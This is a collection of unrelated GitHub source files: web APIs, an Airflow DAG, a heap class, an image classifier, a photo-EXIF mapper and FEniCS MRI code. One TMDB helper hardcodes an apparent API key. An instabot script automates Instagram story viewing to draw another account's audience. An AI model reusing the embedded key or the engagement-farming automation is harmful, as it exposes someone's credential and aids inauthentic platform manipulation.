\"return_date\": row[1], \"departure_station_id\": row[2], \"return_station_id\": row[4], \"distance\": row[6], \"duration\": row[7] }\n                    INITIAL_DATA[\"journeys\"].append(journey)\n                    count = count + 1\n\ndef initialize_table(target, connection, **kw):\n    try:\n        tablename = str(target)\n        if tablename in INITIAL_DATA and len(INITIAL_DATA[tablename]) > 0:\n            connection.execute(target.insert(), INITIAL_DATA[tablename])\n    except Exception as error:\n        time.sleep(1)\n        print(error)\n\nevent.listen(models.Station.__table__, 'after_create', initialize_table)\nevent.listen(models.Journey.__table__, 'after_create', initialize_table)\n\n# This will create the DB schema and trigger the \"after_create\" event\n@app.on_event(\"startup\")\ndef configure():\n    get_data()\n    models.Base.metadata.create_all(bind=engine)\n\n@app.get(\"/journeys\")\nasync def list_all_journeys(db: Session = Depends(get_db)):\n    return crud.list_all_journeys(db=db)\n\n@app.get(\"/stations\")\nasync def list_all_stations(db: Session = Depends(get_db)):\n    return crud.list_all_stations(db=db)\n\n","repo_name":"larenala/citybikes","sub_path":"bikes_backend/app/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2782,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"23624355839","text":"from picamera import PiCamera\nfrom time import sleep\nfrom fractions import Fraction\n\ncamera = PiCamera(resolution=(1280, 720), framerate=Fraction(1, 6), sensor_mode=3)\ncamera.shutter_speed = 6000000\ncamera.iso = 800\nsleep(60)\ncamera.exposure_mode = 'off'\n\ntry:\n    for filename in camera.capture_continuous('/home/pi/augury/test/img{counter:03d}.jpg'):\n        print('Captured %s' % filename)\n        sleep(60) # wait 1 minute\n        camera.exposure_mode = 'off'\nfinally:\n    
camera.close()\n","repo_name":"microresearch/notes","sub_path":"camera.py","file_name":"camera.py","file_ext":"py","file_size_in_byte":492,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"5"} +{"seq_id":"35858244496","text":"import requests\n\napi_key = 'aec5022933c801e70135b0874cc9bf39'\n\ndef nomeFilme(nome):\n url = f'https://api.themoviedb.org/3/search/movie?api_key={api_key}&query={nome}'\n response = requests.get(url)\n return response.json()\n\n ","repo_name":"gabriel-lacerdaa/Galeria-de-Filmes","sub_path":"testes.py","file_name":"testes.py","file_ext":"py","file_size_in_byte":235,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"34480388933","text":"import requests\nimport pandas as pd\nfrom datetime import timedelta\nfrom datetime import datetime\n\nfrom airflow import DAG\nfrom airflow.operators.python import PythonOperator\n\nTOP_1M_DOMAINS = 'http://s3.amazonaws.com/alexa-static/top-1m.csv.zip'\nTOP_1M_DOMAINS_FILE = 'top-1m.csv'\n\n\ndef get_data():\n \n top_doms = pd.read_csv(TOP_1M_DOMAINS)\n top_data = top_doms.to_csv(index=False)\n\n with open(TOP_1M_DOMAINS_FILE, 'w') as f:\n f.write(top_data)\n \ndef get_top_10_domain_zones():\n \n top_data_df = pd.read_csv(TOP_1M_DOMAINS_FILE, names=['rank', 'domain'])\n \n top_10_domain_zones = top_data_df\n top_10_domain_zones['domain_zones'] = top_data_df.domain.str.split('.').str[1]\n top_10_domain_zones['count'] = top_data_df.domain.str.split('.').str[1]\n \n top_10_domain_zones = top_10_domain_zones.groupby('domain_zones', as_index=False).agg({'count': 'count'}).\\\n sort_values('count', ascending=False).reset_index(drop=True).head(10)\n \n with open('top_10_domain_zones.csv', 'w') as f:\n f.write(top_10_domain_zones.to_csv(index=False, header=False))\n\n\ndef get_longest_domain():\n \n top_data_df = pd.read_csv(TOP_1M_DOMAINS_FILE, names=['rank', 'domain'])\n list_of_domains = []\n domain_length = -1\n longest_domain_csv = pd.DataFrame()\n\n for i in range(top_data_df.shape[0]):\n if len(top_data_df.domain[i]) > domain_length:\n domain_length = len(top_data_df.domain[i]) \n \n for i in range(top_data_df.shape[0]):\n if len(top_data_df.domain[i]) == domain_length:\n list_of_domains.append(top_data_df.domain[i])\n\n list_of_domains.sort()\n longest_domain = list_of_domains[0]\n longest_domain = pd.Series(longest_domain)\n longest_domain_csv = longest_domain_csv.append(longest_domain, ignore_index=True)\n longest_domain_csv = longest_domain_csv.rename(columns={0: 'longest_domain'})\n \n with open('longest_domain_csv.csv', 'w') as f:\n f.write(longest_domain_csv.to_csv(index=False, header=False))\n \ndef get_top_airflow():\n \n top_data_df = pd.read_csv(TOP_1M_DOMAINS_FILE, names=['place_in_the_top', 'domain'])\n \n top_airflow = top_data_df.query(\"domain == 'airflow.com'\").place_in_the_top\n\n if not top_airflow.empty:\n top_airflow_csv = top_airflow\n\n else:\n top_airflow = 'airflow.com is not in top'\n top_airflow = pd.Series(top_airflow)\n top_airflow_csv = pd.DataFrame()\n top_airflow_csv = top_airflow_csv.append(top_airflow, ignore_index=True)\n top_airflow_csv = top_airflow_csv.rename(columns={0: 'airflow.com'})\n \n with open('top_airflow_csv.csv', 'w') as f:\n f.write(top_airflow_csv.to_csv(index=False, header=False))\n \ndef print_data(ds):\n \n with open('top_10_domain_zones.csv', 'r') as f:\n all_data_domain_zones = f.read()\n with open('longest_domain_csv.csv', 'r') as f:\n all_data_longest_domain = f.read()\n with 
open('top_airflow_csv.csv', 'r') as f:\n all_data_top_airflow = f.read()\n date = ds\n\n print(f'Top domain zones for date {date}')\n print(all_data_domain_zones)\n\n print(f'The longest_domain for date {date}')\n print(all_data_longest_domain)\n \n print(f'airflow.com top place for date {date}')\n print(all_data_top_airflow)\n\n \n\ndefault_args = {\n 'owner': 'p-annenkov',\n 'depends_on_past': False,\n 'retries': 2,\n 'retry_delay': timedelta(minutes=5),\n 'start_date': datetime(2022, 9, 1),\n}\nschedule_interval = '0 12 * * *'\n\ndag = DAG('p-annenkov_lesson_2_DAG', default_args=default_args, schedule_interval=schedule_interval)\n\nt1 = PythonOperator(task_id='get_data',\n python_callable=get_data,\n dag=dag)\n\nt2_d = PythonOperator(task_id='get_top_10_domain_zones',\n python_callable=get_top_10_domain_zones,\n dag=dag)\n\nt2_l = PythonOperator(task_id='get_longest_domain',\n python_callable=get_longest_domain,\n dag=dag)\n\nt2_a = PythonOperator(task_id='get_top_airflow',\n python_callable=get_top_airflow,\n dag=dag)\n\nt3 = PythonOperator(task_id='print_data',\n python_callable=print_data,\n dag=dag)\n\nt1 >> [t2_d, t2_l, t2_a] >> t3","repo_name":"ageichev/Portfolio","sub_path":"Jupiter notebook/mnt/HC_Volume_18315164/home-jupyter/jupyter-a-a-30/airflow/dags/p-annenkov/Pavel_Annenkov_3_lesson_Task_4.py","file_name":"Pavel_Annenkov_3_lesson_Task_4.py","file_ext":"py","file_size_in_byte":4334,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"35854973643","text":"import time\nimport board\nimport terminalio\nfrom adafruit_matrixportal.matrixportal import MatrixPortal\n\n# You can display in 'GBP', 'EUR' or 'USD'\nCURRENCY = \"USD\"\n# Set up where we'll be fetching data from\nDATA_SOURCE = \"https://api.coindesk.com/v1/bpi/currentprice.json\"\nDATA_LOCATION = [\"bpi\", CURRENCY, \"rate_float\"]\n\n\ndef text_transform(val):\n if CURRENCY == \"USD\":\n return \"$%d\" % val\n if CURRENCY == \"EUR\":\n return \"‎€%d\" % val\n if CURRENCY == \"GBP\":\n return \"£%d\" % val\n return \"%d\" % val\n\n\n# the current working directory (where this file is)\ncwd = (\"/\" + __file__).rsplit(\"/\", 1)[0]\n\nmatrixportal = MatrixPortal(\n url=DATA_SOURCE,\n json_path=DATA_LOCATION,\n status_neopixel=board.NEOPIXEL,\n default_bg=cwd + \"/bitcoin_background.bmp\",\n debug=False,\n)\n\nmatrixportal.add_text(\n text_font=terminalio.FONT,\n text_position=(27, 16),\n text_color=0x3d1f5c,\n text_transform=text_transform,\n)\nmatrixportal.preload_font(b\"$012345789\") # preload numbers\nmatrixportal.preload_font((0x00A3, 0x20AC)) # preload gbp/euro symbol\n\nwhile True:\n try:\n value = matrixportal.fetch()\n print(\"Response is\", value)\n except (ValueError, RuntimeError, ConnectionError, OSError) as e:\n print(\"Some error occured, retrying! 
-\", e)\n\n    time.sleep(3 * 60) # wait 3 minutes\n","repo_name":"adafruit/Adafruit_Learning_System_Guides","sub_path":"Bitcoin_Matrix/code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":1349,"program_lang":"python","lang":"en","doc_type":"code","stars":913,"dataset":"github-code","pt":"5"} +{"seq_id":"40406889331","text":"\"\"\"\n    Watch user likers stories!\n    This script could be very useful to attract someone's audience to your account.\n    If you will not specify the user_id, the script will use your likers as targets.\n    Dependencies:\n        pip install -U instabot\n    Notes:\n        You can change file and add there your comments.\n\"\"\"\n\nimport os\nimport sys\nimport time\nimport random\n\n# in case if you just downloaded zip with sources\nsys.path.append(os.path.join(sys.path[0], '../../'))\nfrom instabot import Bot\n\nbot = Bot()\nbot.login()\n\nif len(sys.argv) >= 2:\n    bot.logger.info(\n        \"\"\"\n        Going to get '%s' likers and watch their stories (and stories of their likers too).\n        \"\"\" % (sys.argv[1])\n    )\n    user_to_get_likers_of = bot.convert_to_user_id(sys.argv[1])\nelse:\n    bot.logger.info(\n        \"\"\"\n        Going to get your likers and watch their stories (and stories of their likers too).\n        You can specify username of another user to start (by default we use you as a starting point).\n        \"\"\"\n    )\n    user_to_get_likers_of = bot.user_id\n\ncurrent_user_id = user_to_get_likers_of\n\ntext_file = open('id_smotr.txt', 'r')\nlines = text_file.read().splitlines()\na = 0\n\nwhile True:\n    try:\n\n        b = a + 10\n        liker_ids = lines[a:b]\n\n        # WATCH USERS STORIES\n        if bot.watch_users_reels(liker_ids):\n            bot.logger.info(\"Total stories viewed: %d\" % bot.total[\"stories_viewed\"])\n\n        # CHOOSE RANDOM LIKER TO GRAB HIS LIKERS AND REPEAT\n        current_user_id = random.choice(liker_ids)\n        a += 10\n\n        if random.random() < 0.05:\n            current_user_id = user_to_get_likers_of\n            bot.logger.info(\"Sleeping and returning back to original user_id=%s\" % current_user_id)\n            time.sleep(90 * random.random() + 60)\n        if b >= len(lines):\n            print('Program finished, the whole list has been processed')\n            break\n\n    except Exception as e:\n        # If something went wrong - sleep long and start again\n        bot.logger.info(e)\n        current_user_id = user_to_get_likers_of\n        time.sleep(240 * random.random() + 60)\n","repo_name":"zoozx/insta","sub_path":"Watch_users_story.py","file_name":"Watch_users_story.py","file_ext":"py","file_size_in_byte":2162,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"15757195376","text":"\nclass nodeWithIndex:\n    \n    def __init__(self, data, index):\n        \n        self.data = data\n        self.index = index\n\n\nclass auxHeap:\n    \n    aux = [nodeWithIndex(data=float('+inf'), index=0)] * 0\n    \n    def length(self):\n        \n        return len(self.aux)\n    \n    # find the minimum of the heap\n    def getmin(self):\n        \n        assert len(self.aux) > 0, \"Empty heap\"\n        return self.aux[0].data, self.aux[0].index # the minimum of a min-heap is in the first position\n    \n    # extract the minimum element from the heap\n    def extract(self):\n        \n        assert len(self.aux) > 0, \"Empty heap\"\n        self.aux[0] = self.aux[-1] # move the last element to the root, then drop it\n        self.aux.pop()\n\n        if len(self.aux) > 0:\n            self.heapify(0)\n    \n    # insert an element into the heap, moving it to the right place\n    def insert(self, x, i):\n        \n        n = nodeWithIndex(data= x, index = i)\n        \n        self.aux.append(n) # append at the end of the array\n        self.moveUp(len(self.aux) - 1) # move the new node up to where it belongs\n    \n    \n    # build the heap from an array\n    def buildHeap(self, a):\n        \n        self.aux = a.copy()\n        \n        for i in range 
(len(self.aux) -1, -1, -1):\n            self.heapify(i)\n    \n    \n    # change an element inside the heap\n    def change(self, i, x):\n        \n        assert i < len(self.aux), \"index out of range\"\n        \n        if x < self.aux[i].data:\n            self.aux[i].data = x\n            self.moveUp(i)\n        elif x > self.aux[i].data:\n            self.aux[i].data = x\n            self.heapify(i)\n    \n    # fix the heap DOWNWARDS (sift-down)\n    def heapify(self, i):\n        left = 2*i +1 \n        right = 2*i +2\n        \n        argMin = i # position of the current element\n        \n        if left < len(self.aux) and self.aux[left].data < self.aux[argMin].data:\n            argMin = left\n        \n        if right < len(self.aux) and self.aux[right].data < self.aux[argMin].data:\n            argMin = right\n        \n        if i != argMin:\n            self.aux[i], self.aux[argMin] = self.aux[argMin], self.aux[i] # swap whole nodes to keep (data, index) paired\n            self.heapify(argMin)\n    \n    \n    # move the node to the right place inside the heap, UPWARDS (sift-up)\n    def moveUp(self, i):\n        \n        if i == 0:\n            return \n        \n        parent = (i + 1) // 2 -1\n        \n        if self.aux[i].data < self.aux[parent].data:\n            self.aux[i], self.aux[parent] = self.aux[parent], self.aux[i] # swap whole nodes to keep (data, index) paired\n            \n            self.moveUp(parent)\n    \n","repo_name":"riccardosantarossa/UNI_Python","sub_path":"es15/auxHeap.py","file_name":"auxHeap.py","file_ext":"py","file_size_in_byte":2552,"program_lang":"python","lang":"it","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"73277585432","text":"import json\nfrom flask import make_response, jsonify, request, Blueprint\nfrom app.api.v1.models.add_hotels import HotelsModel\nfrom app.api.v1.models.users_model import UsersModel\nfrom utils.v1.validations import check_hotels_keys, raise_error, convert_to_int\nfrom flask_jwt_extended import jwt_required\n\nhotels_v1 = Blueprint('hotels_v1', __name__)\n\n\n@hotels_v1.route('/hotels', methods=['POST'])\n@jwt_required\ndef add_hotel():\n    \"\"\"A registered user can book a hotel.\"\"\"\n    errors = check_hotels_keys(request)\n    if errors:\n        return raise_error(400, \"Invalid {} key\".format(', '.join(errors)))\n    details = request.get_json()\n    name = details['name']\n    location = details['location']\n    lodges = details['lodges']\n    conference_rooms = details['conference_rooms']\n    img_url = details['img_url']\n    category = details['category']\n\n    hotel = HotelsModel(name, location, lodges, conference_rooms, img_url, category).save()\n    hotel = json.loads(hotel)\n    return make_response(jsonify({\n        \"status\": \"201\",\n        \"message\": \"You have successfully booked the hotel!\",\n        \"hotel\": hotel\n    }), 201)\n\n@hotels_v1.route('/hotels', methods=['GET'])\n@jwt_required\ndef get_all_hotels():\n    '''Fetch all the existing hotels.'''\n\n    return make_response(jsonify({\n        \"status\": \"200\",\n        \"message\": \"success\",\n        \"hotels\": json.loads(HotelsModel().get_hotels())\n    }), 200)\n\n@hotels_v1.route('/hotels/<string:name>', methods=['GET'])\n@jwt_required\ndef get_hotel(name):\n    \"\"\"Fetch a specific hotel.\"\"\"\n\n    hotel = HotelsModel().get_hotel(name)\n    hotel = json.loads(hotel)\n    if hotel:\n        return make_response(jsonify({\n            \"status\": \"200\",\n            \"message\": \"success\",\n            \"hotel\": hotel\n        }), 200)\n    return make_response(jsonify({\n        \"status\": \"404\",\n        \"message\": \"hotel not found\"\n    }), 404)\n","repo_name":"Arrotech/BookIt","sub_path":"app/api/v1/views/add_hotels.py","file_name":"add_hotels.py","file_ext":"py","file_size_in_byte":1891,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"7111449302","text":"# -*- coding: utf-8 -*-\nfrom fastapi import FastAPI\nfrom dto_request import 
CommentPredictionRequest\nfrom predict import predict_comment\n\napp = FastAPI()\n\n@app.get(\"/health_check\")\nasync def health_check():\n\treturn {\"message\": \"ok\"}\n\n@app.post(\"/comment/predictions\")\nasync def oneBookPredict(item:CommentPredictionRequest):\n res = {}\n # res[\"comment_id\"] = item.comment_id\n preds = predict_comment(item.text)\n res[\"predictions\"] = preds\n return res\n","repo_name":"nhoxlove2k15/sentiment-analyst-comment","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":486,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"73354060313","text":"from flask import Flask, jsonify, render_template\nfrom flask import request\nfrom flask_cors import CORS\n\nfrom recommender import make_recommendation\nimport requests\n\n\napp = Flask(__name__, template_folder=\"./\")\nCORS(app)\n\n\n@app.route(\"/\")\ndef index():\n return render_template(\"index.html\")\n\n\n@app.route(\"/get\")\ndef get_movie():\n # searchTerms = ['horror', 'tomcruise', 'jamescameron', 'blood boat romance magic']\n genre = request.args.get(\"genre\").replace(\" \", \"\")\n actor = request.args.get(\"actor\").replace(\" \", \"\")\n director = request.args.get(\"director\").replace(\" \", \"\")\n keywords = request.args.get(\"keywords\").replace(\" \", \"\").split(\",\")\n keywords = \" \".join(keywords)\n searchTerms = [genre, actor, director, keywords]\n print(\"HELLo\", searchTerms)\n res = make_recommendation(searchTerms=searchTerms)\n res2 = [{\"name\": i[0], \"id\": i[1]} for i in res]\n print(res2)\n return jsonify({\"movies\": res2})\n # return res2\n # return \"Web App with Python Flask!\"\n\n\napp.run(debug=True)\n","repo_name":"YashKarnik/movie-recommendation","sub_path":"backend/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1024,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"36342232081","text":"# Import necessary modules from the transformers library and PIL (Python Imaging Library).\nfrom transformers import ViTImageProcessor, ViTForImageClassification\nfrom PIL import Image as img # used for opening the image.\n\"\"\"\n#ViTForImageClassification\nThe ViTForImageClassification class works by taking an input image, passing it through the pre-trained Vision Transformer layers,\nand producing a probability distribution over predefined class labels,\nallowing it to classify the image into one of those classes based on the learned features.\n\n#ViTImageProcessor\nThis class is part of the Hugging Face Transformers library and is used for preprocessing and\nhandling images before they are input into a Vision Transformer (ViT) model. ( resize, normalize,)\n Define the file name of the image you want to test.\n\"\"\"\nFILE_NAME = 'image_to_test_3.jpg'\n\n# Open the image file using PIL and store it in an image array.\nimage_array = img.open(FILE_NAME) # converts the image in the NumPy array format for manipulation.\n\n# Create a ViTImageProcessor object from a pre-trained ViT model. This processor is used for image pre-processing.\nprocessor = ViTImageProcessor.from_pretrained('google/vit-base-patch16-224')\n\n# Create a ViTForImageClassification model from a pre-trained ViT model. This model is used for image classification.\nmodel = ViTForImageClassification.from_pretrained('google/vit-base-patch16-224')\n\n# Preprocess the input image using the ViTImageProcessor. 
It converts the image into a format suitable for the model.\n# \"return_tensors='pt'\" specifies that the output should be PyTorch tensors.\ninputs = processor(images=image_array, return_tensors=\"pt\")\n\n# Pass the preprocessed input through the ViTForImageClassification model to obtain predictions.\noutputs = model(**inputs)\n\"\"\"\npassing the inputs to the ViT model using double asterisks (**),\nwhich is Python's syntax for unpacking dictionary-like arguments. \nThis means that you're providing the model with the necessary input data in the format it expects.\n\"\"\"\n# Extract the logits (raw model outputs) from the model's output.\nlogits = outputs.logits\n\"\"\"\nLogits are raw model outputs representing unnormalized scores for each class in an image classification task.\nThey are essential as they capture the model's confidence for each class, helping identify the most likely class.\nLogits are typically transformed into probabilities (e.g., using softmax) to make the final classification decision, \naiding accurate image classification.\n\"\"\"\n# Find the index of the class with the highest probability from the logits.\npredicted_class_idx = logits.argmax(-1).item()\n\n# Retrieve the label associated with the predicted class index using the model's configuration.\n# This assumes that the model's configuration includes a mapping from class indices to labels.\nprint(\"Predicted class index:\", predicted_class_idx)\nprint(\"Predicted class:\", model.config.id2label[predicted_class_idx])","repo_name":"ishaanjoshi2002/cautious-computing-machine","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2938,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"73101923992","text":"from exif import Image\nimport folium\nfrom folium.plugins import MarkerCluster\nimport pandas as pd\n\n\noutputfile = 'photo_reader_output/test.txt'\nfolder_path = 'photos'\nimg_filename = 'CI-mg108283-before.jpg'\nimg_path = f'{folder_path}/{img_filename}'\npopup_data = 'mg108283'\n\ndef dms_to_dd(d, m, s):\n    dd = d + float(m)/60 + float(s)/3600\n    return dd\n\nwith open(img_path, 'rb') as img_file:\n    img = Image(img_file)\n\nlist = sorted(img.list_all())\n#liststring = '/n'.join(map(str,list))\n\n\n#with open(outputfile, 'w' ) as f: \n   # f.write(liststring)\nprint(list)\nxcoord = img.get(\"gps_latitude\")\nxcoordref = img.get(\"gps_latitude_ref\")\nycoord = img.get(\"gps_longitude\")\nycoordref = img.get(\"gps_longitude_ref\")\ndatetime = img.get(\"datetime\")\n\nprint(xcoord)\n\nddx = dms_to_dd(xcoord[0], xcoord[1], xcoord[2])\nddy = dms_to_dd(ycoord[0], ycoord[1], ycoord[2])\n\nprint(ycoordref)\n\nif xcoordref == \"S\":\n    x = \"-\"+ str(ddx)\n    x = float(x)\nelse:\n    x = ddx\n\nif ycoordref == \"W\":\n    y = \"-\"+ str(ddy)\n    y = float(y)\n    \nelse:\n    y = ddy\n\n\nprint(x,xcoordref, \" , \" ,y, ycoordref, datetime)\n\nphoto_coords = [x, y]\nprint(photo_coords)\n\nmap = folium.Map(\n    location = photo_coords, \n    zoom_start=15,\n    tiles='https://server.arcgisonline.com/ArcGIS/rest/services/World_Imagery/MapServer/tile/{z}/{y}/{x}',\n    attr='Esri')\n\nfolium.Marker(\n    photo_coords, \n    popup = popup_data, \n    
tooltip='click').add_to(map)\n\n\nmap.save('photo_reader_output/map_test.html')\nmap","repo_name":"henry-the-cudweed/henry-the-cudweed.github.io","sub_path":"slider_creator/photo_reader.py","file_name":"photo_reader.py","file_ext":"py","file_size_in_byte":1513,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"25325242930","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Aug 2 08:34:52 2018\n\n@author: bradenaltstatt\n\"\"\"\n\nintNum = int(input(\"Please enter an integer: \"));\nneg = False;\n\nif intNum < 0:\n neg = True;\n\nroot = 0;\npwr = 2;\n\nprint(\"The integer is: \", intNum);\n# Will always have at least one root/pwr such that intNum=root and pwr = 1\nprint (\"rootFOUND: \", intNum, \" pwrFOUND : \", 1);\n\nwhile 0 < pwr < 6:\n while root**pwr <= abs(intNum):\n# print (\"root: \", root, \" pwr: \", pwr);\n if root**pwr == abs(intNum):\n if neg and pwr%2 != 0:\n print (\"rootFOUND: \", -root, \" pwrFOUND : \", pwr);\n elif not neg:\n print (\"rootFOUND: \", root, \" pwrFOUND : \", pwr);\n root += 1;\n pwr += 1;\n root = 0;\n\n\n\n\n#while (currentInput != root**pwr):\n# print (\"root: \", root, \" pwr : \", pwr);\n# if pwr == 5:\n# pwr = 0;\n# root = root + 1;\n# \n# pwr = pwr + 1;\n \n#print(\"The integer is : \", currentInput);\n#print(\"The root is : \", root);\n#print(\"The pwr is : \", pwr);\n\n\n\n\n\n","repo_name":"bradenaa/MITOCW","sub_path":"6.0001 Introduction to Computer Science and Programming in Python/Readings/exhaustiveROOTpwr.py","file_name":"exhaustiveROOTpwr.py","file_ext":"py","file_size_in_byte":1063,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"27638567706","text":"import nibabel\nfrom dolfin import *\nfrom dolfin_adjoint import *\nimport pathlib\nimport numpy\nfrom nibabel.affines import apply_affine\nimport abc\nimport os\nfrom datetime import datetime\n\nfirsts = {\n \"068\": '20160912_080147',\n \"002\": '20151007_075055',\n \"078\": '20161031_074500',\n \"091\": '20170116_074933',\n \"127\": '20170925_075956',\n \"172\": '20180212_081154',\n \"249\": '20191111_075145',\n \"105\": '20170508_081611',\n \"175\": '20180416_080959',\n \"176\": '20180514_080612',\n \"178\": '20180430_075417',\n \"183\": '20181029_074933',\n \"190\": '20180528_074812',\n \"191\": '20180806_080756',\n \"205\": '20181008_074949',\n \"215\": '20190128_073807',\n \"218\": '20190114_074903',\n \"228\": '20190304_074149',\n \"240\": '20191028_074716',\n \"199\": '20190916_075735',\n \"227\": '20190401_074904',\n \"230\": '20190527_075031',\n \"235\": '20190603_075620',\n \"236\": '20190624_081053',\n \"241\": '20191216_075927'\n }\n\n\nTmax = 2.5 * 24 * 3600\nparameters['allow_extrapolation'] = True\n\ndef find_files(pat, concfolder, data_folder):\n folder = data_folder + '/%s/' % pat + concfolder + '/'\n files = os.listdir(folder)\n new_files = [folder + files[i]\n for i in range(len(files)) if files[i].startswith('2')]\n new_files = sorted(new_files)\n return new_files\n\ndef get_delta_t(f1, f2):\n frmt = '%Y%m%d_%H%M%S'\n A1 = f1.split(\"/\")[-1]\n A2 = f2.split(\"/\")[-1]\n\n try:\n date_time1 = A1.split('_concentration')[0]\n date_time2 = A2.split('_concentration')[0]\n date_obj1 = datetime.strptime(date_time1, frmt)\n date_obj2 = datetime.strptime(date_time2, frmt) \n except ValueError:\n date_time1 = A1.split('_masked_increase')[0]\n date_time2 = A2.split('_masked_increase')[0]\n date_obj1 = datetime.strptime(date_time1, 
frmt)\n date_obj2 = datetime.strptime(date_time2, frmt)\n\n\n \n difference = date_obj2 - date_obj1\n time = difference.days * 3600 * 24 + difference.seconds\n return time\n\n\ndef float_to_filestring(t):\n \"\"\"format t to have two digits before and two digits after comma\n\n Args:\n t ([type]): [description]\n\n Returns:\n string: formated time\n \"\"\"\n if type(t) == str:\n t = float(t)\n t = format(t, \".2f\")\n if len(t) < 5:\n t = \"0\" + t\n return t\n\n\n\ndef interpolate_bc_guess(data, k, params):\n \n t_ = 0\n g_list = []\n idx = 0\n g0 = Function(data.function_space)\n\n # extended_data = data\n data.measurements[\"0.00\"] = g0\n data.time_filename_mapping[\"0.00\"] = None\n\n \n for i in range(k):\n # print(idx)\n t_ += params[\"dt\"]\n\n if t_ > data.measurement_points()[idx + 1] and not (t_ > params[\"T\"]):\n idx += 1\n\n g = Function(data.function_space)\n \n g_i = data.get_measurement(data.measurement_points()[idx]).vector()[:]\n g_ii = data.get_measurement(data.measurement_points()[idx + 1]).vector()[:]\n t_i = data.measurement_points()[idx]\n t_ii = data.measurement_points()[idx + 1]\n inter_dt = t_ii - t_i\n # print(\"t_i\", t_i, \"t,\", t_, \"t_ii\", t_ii)\n \n g.vector()[:] = g_i + (t_ - t_i) * (g_ii - g_i) / inter_dt\n # print(t_, t_i, t_ii, (t_ - t_i))\n\n g_list.append(g)\n\n\n data.measurements.pop(\"0.00\")\n data.time_filename_mapping.pop(\"0.00\")\n\n\n return g_list\n\n\ndef load_fenics_files(functionspace, hdfs, mesh2path, keys_to_load=None):\n \"\"\"_summary_\n\n Args:\n functionspace (FunctionSpace): Space to project loaded functions onto\n hdfs (_type_): folder to hdf files storing the solution\n mesh2path (_type_): path to mesh \n keys_to_load (_type_, optional): If not None, load only specific timepoints\n\n Returns:\n _type_: _description_\n \"\"\"\n\n simulations = {}\n\n mesh2 = Mesh(mesh2path)\n V = FunctionSpace(mesh2, \"CG\", 2)\n\n files = sorted(os.listdir(hdfs), key=lambda x: float(x[:-7]))\n\n if keys_to_load is not None:\n files_ = []\n for file in files:\n t = float_to_filestring(float(file[:-7]) / 3600)\n if t in keys_to_load:\n files_.append(file)\n files = files_\n\n assert len(files) > 1\n\n print(\"Will load files:\")\n for file in files:\n print(file)\n\n for file in files:\n \n t = float_to_filestring(float(file[:-7]) / 3600)\n\n fun = Function(V)\n hdf5 = HDF5File(mesh2.mpi_comm(), hdfs + file, \"r\")\n hdf5_name = \"u\"\n if not hdf5_name.startswith(\"/\"):\n hdf5_name = \"/\" + hdf5_name\n \n hdf5.read(fun, hdf5_name)\n hdf5.close()\n\n simulations[t] = project(fun, V=functionspace)\n \n return simulations\n\n\n\n\n\ndef read_image(filename, space, data_filter=None):\n \n print(\"Loading\", filename)\n \n image2 = nibabel.load(filename)\n data = image2.get_fdata()\n\n\n u_data = Function(space)\n ras2vox = image2.header.get_ras2vox()\n\n ras2vox_tkr_inv = numpy.linalg.inv(image2.header.get_vox2ras_tkr())\n # if tkr is True:\n # ras2vox = ras2vox_tkr_inv\n ras2vox = ras2vox_tkr_inv\n\n xyz = space.tabulate_dof_coordinates()\n ijk = apply_affine(ras2vox, xyz).T\n i, j, k = numpy.rint(ijk).astype(\"int\")\n \n if data_filter is not None:\n data = data_filter(data, ijk, i, j, k)\n u_data.vector()[:] = data[i, j, k]\n else:\n\n print(\"No filter used, setting\", numpy.where(numpy.isnan(data[i, j, k]), 1, 0).sum(), \"/\", i.size, \" nan voxels to 0\")\n data[i, j, k] = numpy.where(numpy.isnan(data[i, j, k]), 0, data[i, j, k])\n u_data.vector()[:] = data[i, j, k]\n\n return u_data\n\n\n\nclass Measurements(abc.ABC):\n def __init__(self, 
function_space, expected_D=None):\n        \n        self.function_space = function_space\n        # mesh = function_space.mesh()\n        self.expected_D = expected_D\n\n    def get_measurement(self, t):\n        raise NotImplementedError\n        # u = Function(self.function_space)\n        # return u\n    \n    def measurement_points(self):\n        raise NotImplementedError\n        # return []\n\n    def dump_pvd(self, vtkpath):\n        \"\"\"Dump all data snapshots to a pvd file\n\n        Args:\n            vtkpath (str): Path to export to, without file extension. Example: /home/tux/test_measurements\n        \"\"\"\n\n        assert not os.path.isdir(vtkpath)\n        assert not vtkpath.endswith(\"/\")\n        \n        u_ = Function(self.function_space)\n\n        vtkfile = File(vtkpath + '.pvd')\n        \n        for t in self.measurement_points():\n            u = self.get_measurement(t)\n            u_.assign(u)\n            vtkfile << u_\n\n\n\n\nclass MRI_Measurements(Measurements):\n\n    def __init__(self, params, \n                data_filter, print_message=True,\n                *args, **kwargs):\n        \n        super(MRI_Measurements, self).__init__(*args, **kwargs)\n        \n        self.params = params\n\n        self.print_message = print_message\n\n        files = sorted(find_files(params[\"pat\"], params[\"concfolder\"], data_folder=params[\"path_to_files\"]))\n\n        if params[\"concfolder\"] == \"FIGURES\":\n            assert False not in [\"_masked_increase\" in x for x in files]\n            files = [firsts[params[\"pat\"]] + \"_masked_increase\"] + [pathlib.Path(x).stem for x in files]\n\n        else:\n            assert False not in [\"concentration\" in x for x 